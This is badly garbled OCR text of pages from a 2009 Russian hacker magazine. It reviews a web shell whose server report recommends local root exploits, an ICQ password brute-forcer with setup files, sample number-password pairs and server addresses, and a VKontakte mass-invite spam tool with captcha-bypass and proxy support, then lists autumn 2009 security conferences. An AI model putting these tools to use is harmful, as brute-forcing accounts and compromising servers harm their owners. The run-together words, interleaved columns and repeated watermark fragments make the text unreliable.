		p						e
		p	df				gКрометого, скриптотображаетмаксимально
			df			n
				-xcha					полнуюинформациюосервере, накотором
									полнуюинформациюосервере, накотором
									размещен:


Server:	blablabla.com (IP)
Operation system:		Linux

server.domain.com 2.6.18-92.1.18. el5.028stab060.2 #1 SMP Tue Jan 13 18:16:58 MSK 2008 i686

Web server application: Apache/2.2.3 (Red Hat) CPU: Unknow

Disk status: Used spase: 22.47 GB Free space: 118.93 GB Total space: 141.4 GB

User domain: Unknow User name: DUM

UID — GID: 500 — 500

Recommended local root exploits: prctl, kmdx, newsmp, pwned, ptrace_ kmod, ong_bak

Passwd file: Readable

cPanel: Unknow (Log file: Not found)

PHP version: 5.1.6 Zend version: 2.1.0

Include path: ./usr/share/pear /usr/ share/php

PHP Modules: libxml xml wddx tokenizer (0.1) sysvshm sysvsem sysvmsg standard (5.1.6) SimpleXML sockets SPL shmop session Reflection pspell posix mime_magic (0.1) iconv hash (1.0) gmp gettext ftp exif (1.4 $Id: exif.c,v 1.173.2.5 2006/04/10 18:23:24 helly Exp $) date (5.1.6) curl ctype calendar bz2 zlib (1.1) pcre openssl apache2handler apc (3.0.19) dbase mysql (1.0) mysqli (0.1) PDO pdo_mysql (1.0.2) pdo_ sqlite (1.0.1)

Disabled functions: Nothing Safe mode: OFF

Open base dir: OFF DBMS: MySQL

Ещеоднимдостоинствомweb-шеллаявляет- сясовместимостьсwin-системами,такчтоне придетсянапрягатьсявпоискахинструментадля управленияломанымвиндовымсервером.

ПРОГРАММА:.BRUTALV.0.7.1 ОС:WINDOWS2000/XP

АВТОР: NTM

Еслитырешилобзавестиськрасивымicqномерком, илижепродажауиновпомогает тебенаскрестинапиво— безфункциональногоинструментанеобойтись. Именнотаким являетсяутила.Brutal, недавнообновившаяся доверсии0.7.1. Тулзапредставляетизсебя многопоточныйбрутфорсерасексобилием полезныхфичей:

1.Поддержка соксов/проксиков: https, socks4, socks5

2.Возможность автоматической очистки дохлых проксиков по таймеру

3.Возможность ручной очистки прок- си-листов: Cleanup All, Cleanup

XÀÊÅÐ 09 /129/ 09

Удобныйинструментдлябрутаасек:)

HTTPs, Cleanup Socks4, Cleanup

Socks5

4.Регулировка количества потоков

5.Функция TimeOut, первое поле — таймаут на подключение (в секундах), второе — таймаут на чтение/запись (в секундах)

Утилаиспользуетнесколькофайлов:

• source.txt — здесьлежатзаписивида уин;пасс, например:

123456;qwerty1

111122;qwerty2

111222;qwerty3

111112;qwerty4

• list.txt — здесьуказываемспискидлябрута, каждыйизуказанныхфайловдолженсодержатьзаписивидауин;пасс:

source1.txt

source2.txt

source3.txt

• servers.txt — сюдавбиваемсписокip:port ICQ-серверов, рекомендуетсяуказыватьпорт 443, например:

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Функциональныйинвайтер

тулзазайметдостойноеместовтвоемнаборе повседневныхутил.

ПРОГРАММА:PUHOVOIINVITER ОС:WINDOWS2000/XP

АВТОР: ПУХОВОЙ

Сростомпопулярностисоциальныхсетей растетиколичестворазнообразногософтадля них. Настраницахжурналаянеразвыкладывалинтересныеутилыподобногорода, поэтому перейдемксофту. Сегодняяхочуобратить твоевниманиенатулзуподназваниемPuhovoi Inviter. Прогапредназначенадляавтоматизацииинвайтингановыхюзероввгруппына www.vkontakte.ru. Изособенностейутилы можновыделить:

•Поддержка многопоточности (<= 500 потоков)

•Возможность работы через acservice (сервис автоматического распознавания капчи)

•Возможность использования проксилиста

•Встроенный прокси-чекер

•Функция сохранения настроек

•Функция проверки баланса в acservice

•Ведение полного логирования всех действий утилы

Стоитотметить, чторассылкаприглашений— неединственнаяфункцияутилы, ибофункционалеенамногошире:

64.12.200.89:443

205.188.251.43:443

205.188.251.11:443

205.188.251.6:443

205.188.251.16:443

205.188.251.21:443

205.188.251.26:443

205.188.251.31:443

•https.txt — списокпроксиков(ip:port)

•socks4.txt — списоксокс4 (ip:port)

•socks5.txt — списоксокс5 (ip:port)

•good.txt — сюдазаписываютсявалидные парыуин;пасс

•config.txt — конфигутилы, создаетсяавтоматически, записивида:

Threads = 100

ConnectionTimeout = 15

ReadTimeOut = 10

CleanUp = 5

Словом, еслитыувлекаешьсябрутомасек—

•Приглашение новых юзеров в группу по списку ID, с использованием 1-го или нескольких аккаунтов

•Ведение блэк-листа — в случае, если юзер запретил отправку приглашений, он заносится в блэк-лист

•Встроенный ID-парсер — в случае отсутствия ID-листа его можно собрать с помощью утилы, используя разнообразные критерии поиска: пол, город, страна, год рождения, положение, онлайн/оффлайн, новые/старые анкеты

•Возможность работы с группой путем удаления неактивных юзеров с дальнейшим добавлением их в áëýê-ëèñò

•Встроенный чекер аккаунтов — позволяет прочекать на валидность список имеющихся аккаунтов

Софтинапредставляетсобойудобныйнабор,состоящийизнебольшихутил.Такчто,смелосливай ееснашегодиска—пригодитсяещенераз.z

075

hang

NOW!

BUY

СЦЕНА

w Click

МАРИЯ «MIFRILL» НЕФЕДОВА / MIFRILL@REAL.XAKEP.RU /

-xcha

1)БиллГейтснафорумеRSA

2) ТакаятемнаякомнатабылаоборудовананаCCC

3)ОбычнаякартинадлялюбойIT-конференции

4) АудиториянаDeepSec

Где

отвисать

остаток

года

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Календарьхакерскихтусовок наосень-зиму2009

Представляемтвоемувниманиюкалендарьвсевозможныхконференций, форумов, фестивалей, демо-патиидругихинтересныхсобытийнаостатоктеку- щегогода. Читай, выбирайивперед— социализироваться!

ПАРАСЛОВОDEFCON	представители крупнейших	Hat и CeBIT уже прошли, не ими	ниодногокрупногоирегулярного
Вместовступления позволь рас-	IT-компаний, юристы, пред-	одними жив наш брат.	мероприятиятакогорода, иим
сказать тебе, что совсем недав-	ставители «органов» и толпы	FRHACK 01	сталообидно. Новместотого
но в славном городе Лас-Вегасе	журналистов. Занятие на Defcon	FRHACK 01	чтобысидетьирасстраиваться,
(в том самом, где блек-джек и	находится всем. Кто-то слушает	КОГДА: 7-11 сентября	придумалииорганизовалисебе
падшие женщины) отгремела	лекции (а кто-то их читает :)),	ГДЕ: Безансон, Франция	FRHACK.
одна из главных хакерских	кто-то обзаводится полезны-	САЙТ: www.frhack.org	Ожидается, что конфа возь-
тусовок планеты — Defcon. Это	ми связями, кто-то участвует	Французскаяконференция	мет с места в карьер и примет
мероприятие на протяжении вот	во всевозможных хакерских	FRHACK позиционируетсякак	порядка полутора тысяч гостей
уже 17 лет (вдумайся в цифру)	конкурсах, а кто-то предпочи-	перваямеждународнаяконфа,	из разных стран мира (офици-
неизменно проводится именно	тает нехакерские, но не менее	созданнаяхакерамидляхакеров.	альные языки мероприятия
в Вегасе и собирает тысячи	веселые состязания.	Ребята, конечно, немногольстят	— английский и французский).
человек со всего мира. Что	Любопытно и то, что Defcon —	себе, ноэто, вобщем-то, прости-	За 4 дня эти люди собираются
забыли там все эти люди? Они	мероприятие в некотором роде	тельно.	обсудить самые разнообразные
приезжают на одно из круп-	элитарное. Здесь собираются	НазваниеFRHACK происходитот	топики — на повестке дня темы
нейших хакерских собраний на	именитые гуру и признанные	сплаваназванийдвухизвестных	от руткитов и криптографии до
нашем шарике, и год от года оно	гении, и за 17 долгих лет конфе-	езинов— французского«FrHack»	хардварь хакинга и вопросов
оправдывает их ожидания.	ренция не опопсела ни на йоту,	илегендарного«Phrack». Вэтом	безопасности SCADA-систем.
Чего и кого здесь только не	«левых» скрипт-киддисов ты тут	годуконференциясостоится	Среди докладчиков обещают
встретишь — ведущие специ-	точно не встретишь.	впервые, начтонамявнонамека-	быть гуру свободного ПО Ричард
алисты в области информаци-	Звучит чертовски заманчиво,	етприставка01 вназвании. Дело	Столлман, Девид Халтон aka
онной безопасности, именитые	верно? Что ж, хотя громкие ме-	втом, чтофранцузынедавно	h1kari и другие, не менее инте-
хакеры, крэкеры и иже с ними,	роприятия вроде Defcon, Black	сообразили, чтовихстраненет	ресные личности.

076	XÀÊÅÐ 09 /129/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

2		4

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

HACKER HALTED USA	обойдется и без уже традици-	HACK IN THE BOX	Например, шестаямеждународная
Когда: 20-25 сентября	онных игр по «захвату флага» и	Когда: 5-8 октября	специализированнаявыставка-
Где: Майями, США	многого, многого другого. Ску-	Где: Куала-Лумпур, Малайзия	конференцияпоинформационной
Сайт: www.hackerhalted.com	чать определенно не придется.	Сайт: www.hackinthebox.org	безопасностинамечается. Состо-
Этаконфа— детище«Междуна-	RAID	Неуспелсъездитьотдохнуть	итсяонавЭкспоцентренаКрасной
родногосоветаконсультантовпо	RAID	этимлетом? Тогдаутебяесть	Пресне, вконцесентября— начале
вопросамэлектроннойком-	Когда: 23-25 сентября	возможностьсовместитьотдых	октября. ВыставкиInfosecurity
мерции», аеслисокращенно—	Где: Сен-Мало, Франция	спосещениеминтересного	проводятсяповсемумирус1996
EC-Council. Чуваки, вчастности,	Сайт: www.rennes.supelec.fr/	форума— крупнейшаявАзии	года, иихорганизациялежитна
известнытем, чтоимеюткучу	RAID2009	конференцияHack In The Box в	плечахкомпанииReed Exhibitions
всевозможныхсертификатов, в	Еще одна французское ме-	этомгодупройдетвМалайзии,	— мировоголидеравобластипро-
томчислеизаконныйсертифи-	роприятие, только в отличие	вКуала-Лумпуре. Будеттебеи	ведениятакогородамероприятий.
кат«этичныххакеров». Чтоэто	от FRHACK — с многолетней	отдых, ихак-фестивальвлучших	Вэтомгодувпрограмменамечены
такое? Всеоченьпросто— их	историей: «Рэйду» уже 12 лет. По	олдскульныхтрадициях.	докладыведущихроссийских
нанимают, чтобыонинестрашно	сути, RAID не хакерская тусовка,	СедьмаяпосчетуHITB неиз-	спецоввобластиIT-безопасности,
инебольновсевзломали,	но весьма серьезный междуна-	менитсебе— впрограмме, как	техническиесеминарыибизнес-
обнаруживпоходудырыибаги,	родный симпозиум, на котором	всегда, заявленыразнообразные	секции. Средиосновныхтопиков
которыепотомсамижеипомогут	ежегодно собираются ведущие	конкурсыповзломуиименитые	Infosecurity: обеспечениеИБпри
закрыть.	исследователи и специалисты,	спикеры, средикоторыхДжо	ведениибизнеса, обсуждение
Hacker Halted проводится уже	представители компаний-лиде-	Грант— президентGrand Idea	законаоперсональныхданных,
много лет в самых разных стра-	ров индустрии, высшие долж-	Studio иоснователиресурса	проблемыинформационнойбезо-
нах — от Дубая до США, и мероп-	ностные лица и т.д. Ученые мужи	wikileaks.org. Такжезаплани-	пасностивбанковскомсекторе, ИБ
риятие ориентировано далеко	съезжаются во Францию с целью	рованцелыйрядтренингов.	вбеспроводныхсетяхит.д.
не на казуалов. Так, в этом году	обмена опытом по очень широ-	Какпоказываютпредыдущие	CHAOS
в США ожидаются, например,	кому спектру вопросов, посвя-	годы— наHITB простонебывает	CHAOS
выступления основателя rootkit.	щенных защите систем и данных	неинтересно, чересчурпафосно	COMMUNICATION
com Грега Хоглунда и профес-	в любых видах и формах. На	илипресно.	CONGRESS
сора Говарда Шмидта — экс	перечисление запланированных	INFOSECURITY	Когда: 3-4 октября
специального советника Белого	к обсуждению топиков не хватит	INFOSECURITY	Где: Берлин, Германия
дома по вопросам безопасности	никакого места, к тому же, можно	MOSCOW	Сайт: www.ccc.de
в киберпространстве. Кроме	ограничиться и более общей	Когда: 29 сентября —	Одно из культовых и старейших
них будет еще 46 (!) докладчи-	формулировкой — все передовые	1 октября	хакерских сборищ на плане-
ков. Пройдут в рамках Hacker	достижения киберпреступников	Где: Москва, Россия	те — Chaos Communication
Halted и различные семинары и	и методы борьбы с ними будут	Сайт: infosecuritymoscow.com	Congress — проводится с 1984
тренинги, в том числе, посвя-	обсуждать именно здесь.	Читаешьидумаешь: «ачтожеу	года! Все началось еще с хакер-
щенные «этичному хакингу». Не		нас»? Унастожевсевпорядке.	ской коалиции Chaos Computer

XÀÊÅÐ 09 /129/ 09

077

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P

				to	BUY						СЦЕНА
w Click				to						m
w Click										m
w
	w								o
	.								.c
		p					g
			df			n		e
				-xcha

1		2

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

Club, появившейся в 80-х. Тогда	Думаешь, есливКанадеплот-	мационнойбезопасностиикрип-	Секьюрити-конференцияком-
основателям Chaos Computer	ностьнаселениясоставляет	тографии. RSA ежегоднопроходит	панииMicrosoft сзабавнымдля
Club подумалось, что непло-	всего3.29 чел./км2, абольшую	каквстранахЕвропыиАзии, так	русскоговорящихлюдейназва-
хо бы организовать какое-то	частьстранызанимаетсуровая	ивСША, нокнамсейчасближе	ниемBlueHat проводитсядваж-
мероприятие для себя и своих	севернаяприрода, тоздесьнет	«европейскаяверсия» форума,	дывгод, иосенне-зимняяуже
единомышленников, где можно	хорошиххак-конференций? Ко-	котораясостоитсявЛондоне, в	наподходе— состоитсявконце
было бы встретиться и обсудить	нечно, есть, иSecTor яркийтому	20-хчислахоктября. Интересно,	октября. Участникимероприятия
самое наболевшее и актуальное.	пример. Болеетого— официаль-	чтокаждыйразRSA проходитпод	гордоименуютсебя«голубыми
В результате появился Chaos	ныйсайтSecTor оченьнескромно	знакомкакой-тоизвестнойисто-	шляпами» (дляуменьшения
Communication Congress.	заявляет, чтовоктябревТоронто	рическойличности, выборкоторой	шоковогоэффектавнашихСМИ
CCC нетолькодожилдонаших	соберутсясамыеизощренныеи	вомногомопределяетуклонвсего	ихобычнозовут«синими»), что
дней, носгодамилишьстал	«темные» умысовсегонашего	мероприятия. Впрошломгодуэто	насамомделенеболеечемана-
лучше. Когоздесьтольконе	голубогошарика. «Злыегении»	былАланТьюринг, авэтомвыбор	логиясэтичнымихакерамиWhite
встретишь— ежегоднособирает-	собираютсяобсудитьсамыеост-	палнаЭдгараАланаПо.	hat ипофигистамиBlack hat.
ся, всреднем, 2000-3500 человек,	рыепроблемынашегокомпью-	НаRSA традиционновыступят	НаBlueHat v9 собираются
средикоторыхипредставители	терногонастоящего, восновном	видныеIT-деятели, средикото-	поговоритьоширокомспектре
хак-сценысовсегомира, иразра-	концентрируясь, конечноже, на	рыхестьиэкспертысмировыми	проблем, средитопиковзаяв-
ботчикиПО, испецыпобезопас-	вопросахсферыбезопасности.	именами, идиректораогромных	ленымобильные\беспроводные
ботчикиПО, испецыпобезопас-	вопросахсферыбезопасности.	именами, идиректораогромных	ленымобильные\беспроводные
			девайсыималварьвсехмастей,
КАЖДЫЙРАЗRSAПРОХОДИТПОДЗНАКОМКА-			реверсныйинжинирингисозда-
			реверсныйинжинирингисозда-
			ниеэксплойтовидругиенехоро-
КОЙ-ТОИЗВЕСТНОЙИСТОРИЧЕСКОЙЛИЧНОС-			шиевещи. Словом, традиционно
КОЙ-ТОИЗВЕСТНОЙИСТОРИЧЕСКОЙЛИЧНОС-			дляMicrosoft — будетнебезын-
ТИ,ВЫБОРКОТОРОЙВОМНОГОМОПРЕДЕЛЯЕТ			тересно, нооченькультурнои«в
ТИ,ВЫБОРКОТОРОЙВОМНОГОМОПРЕДЕЛЯЕТ			рамках».
УКЛОНВСЕГОМЕРОПРИЯТИЯ.ВПРОШЛОМ			TOORCON
ГОДУЭТОБЫЛАЛАНТЬЮРИНГ,АВЭТОМЭДГАР			Когда: 23-25 октября
ГОДУЭТОБЫЛАЛАНТЬЮРИНГ,АВЭТОМЭДГАР			Где: Сан-диего, США
АЛАНПО.			Сайт: www.toorcon.org
			Если у тебя нет желания слушать
			Если у тебя нет желания слушать
			«синих шапок» на BlueHat, вот
ности, идругиеинтересныекадры.	Докладчики-экспертыизСША	компаний. Вопросыобсуждаются	тебе альтернатива — ToorCon,
Какужеможнобылопонять,	иКанадырасскажутипокажут	серьезныеи, чтоназывается, «на	проходящий почти в то же самое
конференциянезацикливается	немалоинтересного, азаплани-	высшемуровне». RSA тотнечаст-	время в солнечном Сан-Диего.
насекьюрити-вопросах— об-	рованныетренинги(например,	ныйслучай, когдазамеропри-	ToorCon конференция старая,
суждаютвсе: новыеразработкии	«Пониманиеатакчерезвеб-	ятиемвполнеможнопоследить	известная, с богатой 11-летней
технологии, драконовскиезаконы,	приложения»), видимо, будут	удаленно, непосещаяеголично.	историей. Мероприятие начи-
хвастаютсясобственноручнона-	настолькохороши, чтозаучастие	Еслиты, конечно, неиспытыва-	налось как тусовка для довольно
писаннымитулзами, обзаводятся	внихпросят, нимного, нимало,	ешьострогожеланияпосмотреть	узкого круга специалистов по
интереснымизнакомствами. CCC	тысячувечнозеленыхденег.	на«сильныхмирасего» своими	безопасности и в первые годы
традиционнооткрытадлявсех	RSA CONFERENCE	глазами.	собирало всего порядка 300-500
желающих, иоеепосещенииеще	RSA CONFERENCE	MS BLUEHAT	человек, нонасегодняшнийдень
никтонежалел:).	(EUROPE)	MS BLUEHAT	ToorCon вышел на совсем иной
SECTOR	Когда: 20-22 октября	Когда: 22-23 октября	уровень. Так же, как и Defcon, эта
SECTOR	Где: Лондон, Великобритания	Где: ÑØÀ	конференция сумела с годами не
Когда: 5-7 октября	Сайт: www.rsaconference.com	Сайт: www.microsoft.com/	растерять своего уникального
Где: Торонто, Канада	Оченьсерьезноемероприятие,	technet/security/bluehat/default.	духа и остается весьма «камер-
Сайт: www.sector.ca	стоящеена«двухкитах» — инфор-	mspx	ной», непафосной и интересной.

078	XÀÊÅÐ 09 /129/ 09

<<< < Предыдущая 1 2 3 4 5 6 78 / 158 9 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202414.76 Mб12124_Optimized.pdf
#
20.04.202411.92 Mб12125_Optimized.pdf
#
20.04.202412.83 Mб12126_Optimized.pdf
#
20.04.202416.73 Mб12127_Optimized.pdf
#
20.04.202416.61 Mб12128_Optimized.pdf
#
20.04.202415.04 Mб12129_Optimized.pdf
#
20.04.202417.96 Mб12130_Optimized.pdf
#
20.04.202417.2 Mб12131_Optimized.pdf
#
20.04.202410.05 Mб12132_Optimized.pdf
#
20.04.202415.19 Mб12133_Optimized.pdf
#
20.04.202415.82 Mб12134_Optimized.pdf